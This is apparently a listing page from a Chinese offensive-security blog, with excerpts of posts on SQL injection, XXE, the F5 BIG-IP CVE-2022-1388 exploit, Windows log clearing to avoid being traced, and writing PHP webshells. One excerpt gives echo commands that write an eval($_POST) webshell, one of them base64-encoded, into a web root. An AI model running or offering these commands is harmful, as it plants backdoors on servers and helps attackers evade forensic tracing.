网络安全 第13页
XSS社区是网络安全爱好者聚集地
我是如何入侵荷兰政府:利用图像进行远程代码执行-XSS博客

我是如何入侵荷兰政府:利用图像进行远程代码执行

动机: 在一次安全会议上,我发现一个人穿着一件 T 恤,上面写着“我黑了荷兰政府,我得到的只是这件糟糕的 T 恤。” ” 出于好奇,我走近他询问他是如何得到它的。我决心要得到那件很酷的...
xss-admin的头像-XSS博客xss-admin2年前
019410
sqlmap帮助文档-XSS博客

sqlmap帮助文档

Usage: python sqlmap.py [options] Options(选项): -h, –help Show basic help message and exit 显示此帮助消息并退出 -hh Show advanced help message and exit 展示先进的帮助信息并退出...
xss-admin的头像-XSS博客xss-admin2年前
019110
痕迹清除 - Windows 日志清除绕过-XSS博客

痕迹清除 – Windows 日志清除绕过

windows 日志清除 目录 在我们日常的安全攻击过程中,登录尝试、流程开发、其他用户和设备行为都记录在 Windows 事件日志中,这将会增大自身被溯源的风险,针对于 windows 日志痕迹清除主要总结...
xss-admin的头像-XSS博客xss-admin2年前
01918
渗透测试 - 登陆口 js 前端加密绕过-XSS博客

渗透测试 – 登陆口 js 前端加密绕过

渗透测试 - 登陆口 js 前端加密绕过
xss-admin的头像-XSS博客xss-admin2年前
019011
updatexml报错手工注入-XSS博客

updatexml报错手工注入

一、描述 updatexml(xml_target, xpath_expr, new_val) xml_target:要进行修改的 XML 类型的字段,或者是 XML 文档字符串。 xpath_expr:XPath 表达式,用于定位要更新的节点。 new_val:新的...
xss-admin的头像-XSS博客xss-admin2年前
019010
渗透测试 - 如何高效率挖掘漏洞-XSS博客

渗透测试 – 如何高效率挖掘漏洞

前言 1、做渗透由始至终,忌讳穿插其他项目进行 2、按顺序细心测试每一个功能点,保证漏洞无遗漏 3、山穷水复疑无路,柳暗花明又一村,一个点利用不到,可以灵活变通尝试其他方向 漏扫工具 AWVS...
xss-admin的头像-XSS博客xss-admin2年前
018811
记php命令执行写shell-XSS博客

记php命令执行写shell

php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...
xss-admin的头像-XSS博客xss-admin2年前
018714
201-A18-xml外部实体注入(XXE漏洞)-XSS博客

201-A18-xml外部实体注入(XXE漏洞)

PS: 文中 XML 代码用代码框显示会出错,故用黄色标明(格式已做调整可以直接使用) 准备工作: Centos7 主机一台,安装 httpd、php 以及 xml 服务 yum -y install httpd httpd-devel php php-xm...
xss-admin的头像-XSS博客xss-admin2年前
018711
漏洞复现 - CVE-2022-1388 F5 BIG-IP RCE-XSS博客

漏洞复现 – CVE-2022-1388 F5 BIG-IP RCE

漏洞原理 hop-by-hop 逐跳,当在请求中遇到这些 header 头,逐跳会进行处理不让其转发至下一跳,比如 Connection: close,abc 在传输过程中,会把 abc 会从原始请求中删除,可以利用此特性进行 ...
xss-admin的头像-XSS博客xss-admin2年前
018515
日常技巧 - 抓取 jar 包 payload 数据-XSS博客

日常技巧 – 抓取 jar 包 payload 数据

fiddler 设置 Connections 端口为 8888 代理设置为 burp 监听的 127.0.0.1:8080 java -DproxySet=true -DproxyHost=localhost -DproxyPort=8888 -jar yonyouNC_unserialize_tool.jar
xss-admin的头像-XSS博客xss-admin2年前
018511